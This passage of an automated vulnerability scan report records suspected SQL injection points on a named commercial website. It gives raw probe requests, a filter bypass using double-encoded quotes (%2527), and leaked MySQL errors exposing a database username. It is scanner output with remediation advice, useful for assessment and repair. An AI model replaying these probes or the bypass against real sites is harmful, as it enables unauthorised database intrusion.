User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:20:59 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /component/jsetup/comment/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:21:01 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.161. http://www.analyticspros.com/component/jsetup/comment/add.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/jsetup/comment/add.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /component/jsetup'/comment/add.html?commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D&titleheader=%5B HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA==&format=html&titleheader=[
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:29:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:29:39 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:29:39 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27613


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<li>Error. Feed not retrieved.</li>
...[SNIP]...

Request 2

GET /component/jsetup''/comment/add.html?commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D&titleheader=%5B HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA==&format=html&titleheader=[
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:29:40 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:29:41 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:29:42 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27467


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.162. http://www.analyticspros.com/component/jsetup/comment/add.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/jsetup/comment/add.html

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /component/jsetup/comment/add.html%2527?commenttype=20&etid=46&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTYwJmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD00NiZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 08:26:51 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /component/jsetup/comment/add.html%2527%2527?commenttype=20&etid=46&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTYwJmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD00NiZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 08:26:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:26:56 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:26:56 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26918


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.163. http://www.analyticspros.com/component/jsetup/comment/add.html [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/jsetup/comment/add.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /component/jsetup/comment/add.html?commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1
Host: www.analyticspros.com
Proxy-Connection: keep-alive
Referer: http://www.analyticspros.com/about.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7%2527
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; fpssCookie=true; apros2.0_tpl=apros2.0; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; __utmb=26076141.26.9.1288999622937; ki_t=1288999540201%3B1288999540201%3B1288999677879%3B1%3B10; __utmmobile=0xade0ac5896f84b3c

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:23:54 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /component/jsetup/comment/add.html?commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1
Host: www.analyticspros.com
Proxy-Connection: keep-alive
Referer: http://www.analyticspros.com/about.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7%2527%2527
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; fpssCookie=true; apros2.0_tpl=apros2.0; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; __utmb=26076141.26.9.1288999622937; ki_t=1288999540201%3B1288999540201%3B1288999677879%3B1%3B10; __utmmobile=0xade0ac5896f84b3c

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:23:55 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:23:58 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:23:58 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 27117


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.164. http://www.analyticspros.com/component/jsetup/comment/add.html [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/jsetup/comment/add.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /component/jsetup/comment/add.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141'; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:49:06 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /component/jsetup/comment/add.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141''; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:49:22 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.165. http://www.analyticspros.com/component/jsetup/comment/add.html [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/jsetup/comment/add.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /component/jsetup/comment/add.html?commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D&titleheader=%5B HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA==&format=html&titleheader=[
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141%2527; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:22:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /component/jsetup/comment/add.html?commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D&titleheader=%5B HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA==&format=html&titleheader=[
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141%2527%2527; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:22:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:22:38 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:22:38 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27449


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.166. http://www.analyticspros.com/component/jsetup/comment/add.html [apros2.0_tpl cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/jsetup/comment/add.html

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the apros2.0_tpl cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /component/jsetup/comment/add.html?commenttype=20&etid=46&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTYwJmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD00NiZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0%2527; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:13:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

